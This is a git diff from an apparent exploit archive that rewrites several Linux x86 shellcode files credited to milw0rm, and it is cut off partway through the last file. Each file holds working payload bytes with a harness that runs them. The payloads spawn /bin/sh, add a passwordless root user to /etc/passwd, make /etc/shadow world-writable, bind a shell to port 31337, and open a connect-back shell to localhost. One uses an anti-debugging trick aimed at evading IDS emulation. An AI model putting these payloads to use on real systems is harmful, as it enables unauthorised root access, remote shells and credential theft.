shellcode; +} + // milw0rm.com [2006-01-25] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13384.c b/platforms/lin_x86/shellcode/13384.c index a86b25724..dcc6dd50c 100755 --- a/platforms/lin_x86/shellcode/13384.c +++ b/platforms/lin_x86/shellcode/13384.c @@ -1,34 +1,34 @@ -/* - * (linux/x86) - execve("/bin/sh", ["/bin/sh"], NULL) / encoded by +1 - 39 bytes - * - izik - */ - -char shellcode[] = - - "\x68\x8a\xe2\xce\x81" // push $0x81cee28a - "\x68\xb1\x0c\x53\x54" // push $0x54530cb1 - "\x68\x6a\x6f\x8a\xe4" // push $0xe48a6f6a - "\x68\x01\x69\x30\x63" // push $0x63306901 - "\x68\x69\x30\x74\x69" // push $0x69743069 - "\x6a\x14" // push $0x14 - "\x59" // pop %ecx - - // - // <_unpack_loop>: - // - - "\xfe\x0c\x0c" // decb (%esp,%ecx,1) - "\x49" // dec %ecx - "\x79\xfa" // jns <_unpack_loop> - "\x41" // inc %ecx - "\xf7\xe1" // mul %ecx - "\x54" // push %esp - "\xc3"; // ret - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) - execve("/bin/sh", ["/bin/sh"], NULL) / encoded by +1 - 39 bytes + * - izik + */ + +char shellcode[] = + + "\x68\x8a\xe2\xce\x81" // push $0x81cee28a + "\x68\xb1\x0c\x53\x54" // push $0x54530cb1 + "\x68\x6a\x6f\x8a\xe4" // push $0xe48a6f6a + "\x68\x01\x69\x30\x63" // push $0x63306901 + "\x68\x69\x30\x74\x69" // push $0x69743069 + "\x6a\x14" // push $0x14 + "\x59" // pop %ecx + + // + // <_unpack_loop>: + // + + "\xfe\x0c\x0c" // decb (%esp,%ecx,1) + "\x49" // dec %ecx + "\x79\xfa" // jns <_unpack_loop> + "\x41" // inc %ecx + "\xf7\xe1" // mul %ecx + "\x54" // push %esp + "\xc3"; // ret + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-25] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13385.c b/platforms/lin_x86/shellcode/13385.c index b3ff921ce..e9acf632e 100755 --- a/platforms/lin_x86/shellcode/13385.c +++ b/platforms/lin_x86/shellcode/13385.c @@ -1,41 +1,41 @@ -/* - * (linux/x86) adds user 'xtz' without password to /etc/passwd - 59 bytes - * - izik - */ - -char shellcode[] = - - "\x6a\x05" // push $0x5 - - // - // <_exit>: - // - - "\x58" // pop %eax - "\x99" // cltd - "\x31\xc9" // xor %ecx,%ecx - "\x66\xb9\x01\x04" // mov $0x401,%cx - "\x52" // push %edx - "\x68\x73\x73\x77\x64" // push $0x64777373 - "\x68\x63\x2f\x70\x61" // push $0x61702f63 - "\x68\x2f\x2f\x65\x74" // push $0x74652f2f - "\x89\xe3" // mov %esp,%ebx - "\xcd\x80" // int $0x80 - "\x68\x3a\x3a\x3a\x0a" // push $0xa3a3a3a - "\x68\x3a\x30\x3a\x30" // push $0x303a303a - "\x68\x78\x74\x7a\x3a" // push $0x3a7a7478 - "\x89\xc3" // mov %eax,%ebx - "\xb0\x04" // mov $0x4,%al - "\x89\xe1" // mov %esp,%ecx - "\xb2\x0c" // mov $0xc,%dl - "\xcd\x80" // int $0x80 - "\x6a\x01" // push $0x1 - "\xeb\xc7"; // jmp <_exit> - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) adds user 'xtz' without password to /etc/passwd - 59 bytes + * - izik + */ + +char shellcode[] = + + "\x6a\x05" // push $0x5 + + // + // <_exit>: + // + + "\x58" // pop %eax + "\x99" // cltd + "\x31\xc9" // xor %ecx,%ecx + "\x66\xb9\x01\x04" // mov $0x401,%cx + "\x52" // push %edx + "\x68\x73\x73\x77\x64" // push $0x64777373 + "\x68\x63\x2f\x70\x61" // push $0x61702f63 + "\x68\x2f\x2f\x65\x74" // push $0x74652f2f + "\x89\xe3" // mov %esp,%ebx + "\xcd\x80" // int $0x80 + "\x68\x3a\x3a\x3a\x0a" // push $0xa3a3a3a + "\x68\x3a\x30\x3a\x30" // push $0x303a303a + "\x68\x78\x74\x7a\x3a" // push $0x3a7a7478 + "\x89\xc3" // mov %eax,%ebx + "\xb0\x04" // mov $0x4,%al + "\x89\xe1" // mov %esp,%ecx + "\xb2\x0c" // mov $0xc,%dl + "\xcd\x80" // int $0x80 + "\x6a\x01" // push $0x1 + "\xeb\xc7"; // jmp <_exit> + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-21] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13386.c b/platforms/lin_x86/shellcode/13386.c index 8102042af..703e02c08 100755 --- a/platforms/lin_x86/shellcode/13386.c +++ b/platforms/lin_x86/shellcode/13386.c @@ -1,54 +1,54 @@ -/* - * (linux/x86) anti-debug trick (INT 3h trap) + execve("/bin/sh", ["/bin/sh", NULL], NULL) - 39 bytes - * - * The idea behind a shellcode w/ an anti-debugging trick embedded in it, is if for any reason the IDS - * would try to x86-emulate the shellcode it would *glitch* and fail. This also protectes the shellcode - * from running within a debugger environment such as gdb and strace. - * - * How this works? the shellcode registers for the SIGTRAP signal (aka. Breakpoint Interrupt) and use it - * to call the acutal payload (e.g. _evil_code) while a greedy debugger or a confused x86-emu won't pass - * the signal handler to the shellcode, it would end up doing _exit() instead execuve() - * - * - izik - */ - -char shellcode[] = - - "\x6a\x30" // push $0x30 - "\x58" // pop %eax - "\x6a\x05" // push $0x5 - "\x5b" // pop %ebx - "\xeb\x05" // jmp <_evil_code> - - // - // <_evilcode_loc>: - // - - "\x59" // pop %ecx - "\xcd\x80" // int $0x80 - "\xcc" // int3 - "\x40" // inc %eax - "\xe8\xf6\xff\xff\xff" // call <_evilcode_loc> - "\x99" // cltd - - // - // <_evil_code>: - // - - "\xb0\x0b" // mov $0xb,%al - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp,%ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x54" // push %esp - "\xeb\xe1"; // jmp <_evilcode_loc> - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) anti-debug trick (INT 3h trap) + execve("/bin/sh", ["/bin/sh", NULL], NULL) - 39 bytes + * + * The idea behind a shellcode w/ an anti-debugging trick embedded in it, is if for any reason the IDS + * would try to x86-emulate the shellcode it would *glitch* and fail. This also protectes the shellcode + * from running within a debugger environment such as gdb and strace. + * + * How this works? the shellcode registers for the SIGTRAP signal (aka. Breakpoint Interrupt) and use it + * to call the acutal payload (e.g. _evil_code) while a greedy debugger or a confused x86-emu won't pass + * the signal handler to the shellcode, it would end up doing _exit() instead execuve() + * + * - izik + */ + +char shellcode[] = + + "\x6a\x30" // push $0x30 + "\x58" // pop %eax + "\x6a\x05" // push $0x5 + "\x5b" // pop %ebx + "\xeb\x05" // jmp <_evil_code> + + // + // <_evilcode_loc>: + // + + "\x59" // pop %ecx + "\xcd\x80" // int $0x80 + "\xcc" // int3 + "\x40" // inc %eax + "\xe8\xf6\xff\xff\xff" // call <_evilcode_loc> + "\x99" // cltd + + // + // <_evil_code>: + // + + "\xb0\x0b" // mov $0xb,%al + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x54" // push %esp + "\xeb\xe1"; // jmp <_evilcode_loc> + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-21] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13387.c b/platforms/lin_x86/shellcode/13387.c index 91be3d8e3..3c4db19e4 100755 --- a/platforms/lin_x86/shellcode/13387.c +++ b/platforms/lin_x86/shellcode/13387.c @@ -1,71 +1,71 @@ -/* - * (linux/x86) bind '/bin/sh' to 31337/tcp - 80 bytes - * - izik - */ - -char shellcode[] = - - "\x6a\x66" // push $0x66 - "\x58" // pop %eax - "\x99" // cltd - "\x6a\x01" // push $0x1 - "\x5b" // pop %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x6a\x02" // push $0x2 - - // - // <_doint>: - // - - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 - - "\x5b" // pop %ebx - "\x5d" // pop %ebp - "\x52" // push %edx - "\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337) - "\x0f\xcd" // bswap %ebp - "\x09\xdd" // or %ebx,%ebp - "\x55" // push %ebp - "\x6a\x10" // push $0x10 - "\x51" // push %ecx - "\x50" // push %eax - "\x89\xe1" // mov %esp,%ecx - "\xb0\x66" // mov $0x66,%al - "\xcd\x80" // int $0x80 - "\xb3\x04" // mov $0x4,%bl - "\xb0\x66" // mov $0x66,%al - "\xcd\x80" // int $0x80 - "\x89\x64\x24\x08" // mov %esp,0x8(%esp) - "\x43" // inc %ebx - "\xb0\x66" // mov $0x66,%al - "\xcd\x80" // int $0x80 - "\x93" // xchg %eax,%ebx - "\x59" // pop %ecx - - // - // <_dup2loop>: - // - - "\xb0\x3f" // mov $0x3f,%al - "\xcd\x80" // int $0x80 - "\x49" // dec %ecx - "\x79\xf9" // jns <_dup2loop> - - "\xb0\x0b" // mov $0xb,%al - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp,%ebx - "\x52" // push %edx - "\x53" // push %ebx - "\xeb\xbb"; // jmp <_doint> - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) bind '/bin/sh' to 31337/tcp - 80 bytes + * - izik + */ + +char shellcode[] = + + "\x6a\x66" // push $0x66 + "\x58" // pop %eax + "\x99" // cltd + "\x6a\x01" // push $0x1 + "\x5b" // pop %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x6a\x02" // push $0x2 + + // + // <_doint>: + // + + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 + + "\x5b" // pop %ebx + "\x5d" // pop %ebp + "\x52" // push %edx + "\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337) + "\x0f\xcd" // bswap %ebp + "\x09\xdd" // or %ebx,%ebp + "\x55" // push %ebp + "\x6a\x10" // push $0x10 + "\x51" // push %ecx + "\x50" // push %eax + "\x89\xe1" // mov %esp,%ecx + "\xb0\x66" // mov $0x66,%al + "\xcd\x80" // int $0x80 + "\xb3\x04" // mov $0x4,%bl + "\xb0\x66" // mov $0x66,%al + "\xcd\x80" // int $0x80 + "\x89\x64\x24\x08" // mov %esp,0x8(%esp) + "\x43" // inc %ebx + "\xb0\x66" // mov $0x66,%al + "\xcd\x80" // int $0x80 + "\x93" // xchg %eax,%ebx + "\x59" // pop %ecx + + // + // <_dup2loop>: + // + + "\xb0\x3f" // mov $0x3f,%al + "\xcd\x80" // int $0x80 + "\x49" // dec %ecx + "\x79\xf9" // jns <_dup2loop> + + "\xb0\x0b" // mov $0xb,%al + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\xeb\xbb"; // jmp <_doint> + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-21] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13388.c b/platforms/lin_x86/shellcode/13388.c index e438b7248..c39d156f8 100755 --- a/platforms/lin_x86/shellcode/13388.c +++ b/platforms/lin_x86/shellcode/13388.c @@ -1,93 +1,93 @@ -/* - * (linux/x86) bind '/bin/sh' to 31337/tcp + fork() - 98 bytes - * - izik - */ - -char shellcode[] = - - "\x6a\x66" // push $0x66 - "\x58" // pop %eax - "\x99" // cltd - "\x6a\x01" // push $0x1 - "\x5b" // pop %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x6a\x02" // push $0x2 - - // - // <_doint>: - // - - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 - - "\x5b" // pop %ebx - "\x5d" // pop %ebp - "\x52" // push %edx - "\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337) - "\x0f\xcd" // bswap %ebp - "\x09\xdd" // or %ebx,%ebp - "\x55" // push %ebp - "\x6a\x10" // push $0x10 - "\x51" // push %ecx - "\x50" // push %eax - "\x89\xe1" // mov %esp,%ecx - "\xb0\x66" // mov $0x66,%al - "\xcd\x80" // int $0x80 - "\xb3\x04" // mov $0x4,%bl - "\xb0\x66" // mov $0x66,%al - "\xcd\x80" // int $0x80 - - // - // <_acceptloop>: - // - - "\x5f" // pop %edi - "\x50" // push %eax - "\x50" // push %eax - "\x57" // push %edi - "\x89\xe1" // mov %esp,%ecx - "\x43" // inc %ebx - "\xb0\x66" // mov $0x66,%al - "\xcd\x80" // int $0x80 - "\x93" // xchg %eax,%ebx - "\xb0\x02" // mov $0x2,%al - "\xcd\x80" // int $0x80 - "\x85\xc0" // test %eax,%eax - "\x75\x1a" // jne <_parent> - "\x59" // pop %ecx - - // - // <_dup2loop>: - // - - "\xb0\x3f" // mov $0x3f,%al - "\xcd\x80" // int $0x80 - "\x49" // dec %ecx - "\x79\xf9" // jns <_dup2loop> - - "\xb0\x0b" // mov $0xb,%al - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp,%ebx - "\x52" // push %edx - "\x53" // push %ebx - "\xeb\xb2" // jmp <_doint> - - // - // <_parent>: - // - - "\x6a\x06" // push $0x6 - "\x58" // pop %eax - "\xcd\x80" // int $0x80 - "\xb3\x04" // mov $0x4,%bl - "\xeb\xc9"; // jmp <_acceptloop> - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) bind '/bin/sh' to 31337/tcp + fork() - 98 bytes + * - izik + */ + +char shellcode[] = + + "\x6a\x66" // push $0x66 + "\x58" // pop %eax + "\x99" // cltd + "\x6a\x01" // push $0x1 + "\x5b" // pop %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x6a\x02" // push $0x2 + + // + // <_doint>: + // + + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 + + "\x5b" // pop %ebx + "\x5d" // pop %ebp + "\x52" // push %edx + "\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337) + "\x0f\xcd" // bswap %ebp + "\x09\xdd" // or %ebx,%ebp + "\x55" // push %ebp + "\x6a\x10" // push $0x10 + "\x51" // push %ecx + "\x50" // push %eax + "\x89\xe1" // mov %esp,%ecx + "\xb0\x66" // mov $0x66,%al + "\xcd\x80" // int $0x80 + "\xb3\x04" // mov $0x4,%bl + "\xb0\x66" // mov $0x66,%al + "\xcd\x80" // int $0x80 + + // + // <_acceptloop>: + // + + "\x5f" // pop %edi + "\x50" // push %eax + "\x50" // push %eax + "\x57" // push %edi + "\x89\xe1" // mov %esp,%ecx + "\x43" // inc %ebx + "\xb0\x66" // mov $0x66,%al + "\xcd\x80" // int $0x80 + "\x93" // xchg %eax,%ebx + "\xb0\x02" // mov $0x2,%al + "\xcd\x80" // int $0x80 + "\x85\xc0" // test %eax,%eax + "\x75\x1a" // jne <_parent> + "\x59" // pop %ecx + + // + // <_dup2loop>: + // + + "\xb0\x3f" // mov $0x3f,%al + "\xcd\x80" // int $0x80 + "\x49" // dec %ecx + "\x79\xf9" // jns <_dup2loop> + + "\xb0\x0b" // mov $0xb,%al + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\xeb\xb2" // jmp <_doint> + + // + // <_parent>: + // + + "\x6a\x06" // push $0x6 + "\x58" // pop %eax + "\xcd\x80" // int $0x80 + "\xb3\x04" // mov $0x4,%bl + "\xeb\xc9"; // jmp <_acceptloop> + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-21] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13389.c b/platforms/lin_x86/shellcode/13389.c index e9a269059..ac9399d81 100755 --- a/platforms/lin_x86/shellcode/13389.c +++ b/platforms/lin_x86/shellcode/13389.c @@ -1,35 +1,35 @@ -/* - * (linux/x86) 24/7 open cd-rom loop (follows "/dev/cdrom" symlink) - 39 bytes - * - izik - */ - -char shellcode[] = - - "\x6a\x05" // push $0x5 - "\x58" // pop %eax - "\x31\xc9" // xor %ecx,%ecx - "\x51" // push %ecx - "\xb5\x08" // mov $0x8,%ch - "\x68\x64\x72\x6f\x6d" // push $0x6d6f7264 - "\x68\x65\x76\x2f\x63" // push $0x632f7665 - "\x68\x2f\x2f\x2f\x64" // push $0x642f2f2f - "\x89\xe3" // mov %esp,%ebx - "\xcd\x80" // int $0x80 - "\x89\xc3" // mov %eax,%ebx - "\x66\xb9\x09\x53" // mov $0x5309,%cx - - // - // <_openit>: - // - - "\xb0\x36" // mov $0x36,%al - "\xcd\x80" // int $0x80 - "\xeb\xfa"; // jmp <_openit> - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) 24/7 open cd-rom loop (follows "/dev/cdrom" symlink) - 39 bytes + * - izik + */ + +char shellcode[] = + + "\x6a\x05" // push $0x5 + "\x58" // pop %eax + "\x31\xc9" // xor %ecx,%ecx + "\x51" // push %ecx + "\xb5\x08" // mov $0x8,%ch + "\x68\x64\x72\x6f\x6d" // push $0x6d6f7264 + "\x68\x65\x76\x2f\x63" // push $0x632f7665 + "\x68\x2f\x2f\x2f\x64" // push $0x642f2f2f + "\x89\xe3" // mov %esp,%ebx + "\xcd\x80" // int $0x80 + "\x89\xc3" // mov %eax,%ebx + "\x66\xb9\x09\x53" // mov $0x5309,%cx + + // + // <_openit>: + // + + "\xb0\x36" // mov $0x36,%al + "\xcd\x80" // int $0x80 + "\xeb\xfa"; // jmp <_openit> + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-21] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13390.c b/platforms/lin_x86/shellcode/13390.c index af7d516a7..0d48839f6 100755 --- a/platforms/lin_x86/shellcode/13390.c +++ b/platforms/lin_x86/shellcode/13390.c @@ -1,31 +1,31 @@ -/* - * (linux/x86) eject cd-rom (follows "/dev/cdrom" symlink) + exit() - 40 bytes - * - izik - */ - -char shellcode[] = - - "\x6a\x05" // push $0x5 - "\x58" // pop %eax - "\x31\xc9" // xor %ecx,%ecx - "\x51" // push %ecx - "\xb5\x08" // mov $0x8,%ch - "\x68\x64\x72\x6f\x6d" // push $0x6d6f7264 - "\x68\x65\x76\x2f\x63" // push $0x632f7665 - "\x68\x2f\x2f\x2f\x64" // push $0x642f2f2f - "\x89\xe3" // mov %esp,%ebx - "\xcd\x80" // int $0x80 - "\x89\xc3" // mov %eax,%ebx - "\xb0\x36" // mov $0x36,%al - "\x66\xb9\x09\x53" // mov $0x5309,%cx - "\xcd\x80" // int $0x80 - "\x40" // inc %eax - "\xcd\x80"; // int $0x80 - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) eject cd-rom (follows "/dev/cdrom" symlink) + exit() - 40 bytes + * - izik + */ + +char shellcode[] = + + "\x6a\x05" // push $0x5 + "\x58" // pop %eax + "\x31\xc9" // xor %ecx,%ecx + "\x51" // push %ecx + "\xb5\x08" // mov $0x8,%ch + "\x68\x64\x72\x6f\x6d" // push $0x6d6f7264 + "\x68\x65\x76\x2f\x63" // push $0x632f7665 + "\x68\x2f\x2f\x2f\x64" // push $0x642f2f2f + "\x89\xe3" // mov %esp,%ebx + "\xcd\x80" // int $0x80 + "\x89\xc3" // mov %eax,%ebx + "\xb0\x36" // mov $0x36,%al + "\x66\xb9\x09\x53" // mov $0x5309,%cx + "\xcd\x80" // int $0x80 + "\x40" // inc %eax + "\xcd\x80"; // int $0x80 + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-21] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13391.c b/platforms/lin_x86/shellcode/13391.c index ef446c073..7706fd5b9 100755 --- a/platforms/lin_x86/shellcode/13391.c +++ b/platforms/lin_x86/shellcode/13391.c @@ -1,43 +1,43 @@ -/* - * (linux/x86) eject & close cd-rom frenzy loop (follows "/dev/cdrom" symlink) - 45 bytes - * - izik - */ - -char shellcode[] = - - "\x6a\x05" // push $0x5 - "\x58" // pop %eax - "\x31\xc9" // xor %ecx,%ecx - "\x51" // push %ecx - "\xb5\x08" // mov $0x8,%ch - "\x68\x64\x72\x6f\x6d" // push $0x6d6f7264 - "\x68\x65\x76\x2f\x63" // push $0x632f7665 - "\x68\x2f\x2f\x2f\x64" // push $0x642f2f2f - "\x89\xe3" // mov %esp,%ebx - "\xcd\x80" // int $0x80 - "\x89\xc3" // mov %eax,%ebx - - // - // <_makeio>: - // - - "\x66\xb9\x09\x53" // mov $0x5309,%cx - - // - // <_frenzy>: - // - - "\xb0\x36" // mov $0x36,%al - "\xcd\x80" // int $0x80 - "\xf5" // cmc - "\x72\xf5" // jc <_makeio> - "\x80\xc1\x10" // add $0x10,%cl - "\xeb\xf4"; // jmp <_frenzy> - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) eject & close cd-rom frenzy loop (follows "/dev/cdrom" symlink) - 45 bytes + * - izik + */ + +char shellcode[] = + + "\x6a\x05" // push $0x5 + "\x58" // pop %eax + "\x31\xc9" // xor %ecx,%ecx + "\x51" // push %ecx + "\xb5\x08" // mov $0x8,%ch + "\x68\x64\x72\x6f\x6d" // push $0x6d6f7264 + "\x68\x65\x76\x2f\x63" // push $0x632f7665 + "\x68\x2f\x2f\x2f\x64" // push $0x642f2f2f + "\x89\xe3" // mov %esp,%ebx + "\xcd\x80" // int $0x80 + "\x89\xc3" // mov %eax,%ebx + + // + // <_makeio>: + // + + "\x66\xb9\x09\x53" // mov $0x5309,%cx + + // + // <_frenzy>: + // + + "\xb0\x36" // mov $0x36,%al + "\xcd\x80" // int $0x80 + "\xf5" // cmc + "\x72\xf5" // jc <_makeio> + "\x80\xc1\x10" // add $0x10,%cl + "\xeb\xf4"; // jmp <_frenzy> + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-21] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13392.c b/platforms/lin_x86/shellcode/13392.c index 8db28bc1c..9c9b417bd 100755 --- a/platforms/lin_x86/shellcode/13392.c +++ b/platforms/lin_x86/shellcode/13392.c @@ -1,27 +1,27 @@ -/* - * (linux/x86) chmod("/etc/shadow", 0666) + exit() - 32 bytes - * - izik - */ - -char shellcode[] = - - "\x6a\x0f" // push $0xf - "\x58" // pop %eax - "\x31\xc9" // xor %ecx,%ecx - "\x51" // push %ecx - "\x66\xb9\xb6\x01" // mov $0x1b6,%cx - "\x68\x61\x64\x6f\x77" // push $0x776f6461 - "\x68\x63\x2f\x73\x68" // push $0x68732f63 - "\x68\x2f\x2f\x65\x74" // push $0x74652f2f - "\x89\xe3" // mov %esp,%ebx - "\xcd\x80" // int $0x80 - "\x40" // inc %eax - "\xcd\x80"; // int $0x80 - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) chmod("/etc/shadow", 0666) + exit() - 32 bytes + * - izik + */ + +char shellcode[] = + + "\x6a\x0f" // push $0xf + "\x58" // pop %eax + "\x31\xc9" // xor %ecx,%ecx + "\x51" // push %ecx + "\x66\xb9\xb6\x01" // mov $0x1b6,%cx + "\x68\x61\x64\x6f\x77" // push $0x776f6461 + "\x68\x63\x2f\x73\x68" // push $0x68732f63 + "\x68\x2f\x2f\x65\x74" // push $0x74652f2f + "\x89\xe3" // mov %esp,%ebx + "\xcd\x80" // int $0x80 + "\x40" // inc %eax + "\xcd\x80"; // int $0x80 + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-21] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13393.c b/platforms/lin_x86/shellcode/13393.c index 99409f454..f5ef2db62 100755 --- a/platforms/lin_x86/shellcode/13393.c +++ b/platforms/lin_x86/shellcode/13393.c @@ -1,65 +1,65 @@ -/* - * (linux/x86) connect-back shellcode, 127.0.0.1:31337/tcp - 74 bytes - * - izik - */ - -char shellcode[] = - - "\x6a\x66" // push $0x66 - "\x58" // pop %eax - "\x99" // cltd - "\x6a\x01" // push $0x1 - "\x5b" // pop %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x6a\x02" // push $0x2 - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 - "\x5b" // pop %ebx - "\x5d" // pop %ebp - "\xbe\x80\xff\xff\xfe" // mov $0xfeffff80,%esi (0xxfeffff80 = ~127.0.0.1) - "\xf7\xd6" // not %esi - "\x56" // push %esi - "\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337) - "\x0f\xcd" // bswap %ebp - "\x09\xdd" // or %ebx,%ebp - "\x55" // push %ebp - "\x43" // inc %ebx - "\x6a\x10" // push $0x10 - "\x51" // push %ecx - "\x50" // push %eax - "\xb0\x66" // mov $0x66,%al - - // - // <_doint>: - // - - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 - "\x87\xd9" // xchg %ebx,%ecx - "\x5b" // pop %ebx - - // - // <_dup2loop>: - // - - "\xb0\x3f" // mov $0x3f,%al - "\xcd\x80" // int $0x80 - "\x49" // dec %ecx - "\x79\xf9" // jns <_dup2loop> - "\xb0\x0b" // mov $0xb,%al - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp,%ebx - "\x52" // push %edx - "\x53" // push %ebx - "\xeb\xdf"; // jmp <_doint> - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) connect-back shellcode, 127.0.0.1:31337/tcp - 74 bytes + * - izik + */ + +char shellcode[] = + + "\x6a\x66" // push $0x66 + "\x58" // pop %eax + "\x99" // cltd + "\x6a\x01" // push $0x1 + "\x5b" // pop %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x6a\x02" // push $0x2 + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 + "\x5b" // pop %ebx + "\x5d" // pop %ebp + "\xbe\x80\xff\xff\xfe" // mov $0xfeffff80,%esi (0xxfeffff80 = ~127.0.0.1) + "\xf7\xd6" // not %esi + "\x56" // push %esi + "\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337) + "\x0f\xcd" // bswap %ebp + "\x09\xdd" // or %ebx,%ebp + "\x55" // push %ebp + "\x43" // inc %ebx + "\x6a\x10" // push $0x10 + "\x51" // push %ecx + "\x50" // push %eax + "\xb0\x66" // mov $0x66,%al + + // + // <_doint>: + // + + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 + "\x87\xd9" // xchg %ebx,%ecx + "\x5b" // pop %ebx + + // + // <_dup2loop>: + // + + "\xb0\x3f" // mov $0x3f,%al + "\xcd\x80" // int $0x80 + "\x49" // dec %ecx + "\x79\xf9" // jns <_dup2loop> + "\xb0\x0b" // mov $0xb,%al + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\xeb\xdf"; // jmp <_doint> + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-01-21] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13395.c b/platforms/lin_x86/shellcode/13395.c index 1e0082a9f..2f7291c83 100755 --- a/platforms/lin_x86/shellcode/13395.c +++ b/platforms/lin_x86/shellcode/13395.c @@ -1,45 +1,45 @@ -/* - * (linux/x86) getppid() + execve("/proc//exe", ["/proc//exe", NULL]) - 51 bytes - * - izik - */ - -char shellcode[] = - - "\x6a\x40" // push $0x40 - "\x58" // pop %eax - "\xcd\x80" // int $0x80 - - // - // <_convert>: - // - - "\x4c" // dec %esp - "\x99" // cltd - "\x6a\x0a" // push $0xa - "\x5b" // pop %ebx - "\xf7\xf3" // div %ebx - "\x80\xc2\x30" // add $0x30,%dl - "\x88\x14\x24" // mov %dl,(%esp) - "\x85\xc0" // test %eax,%eax - "\x75\xef" // jnz _convert - "\x99" // cltd - "\x5b" // 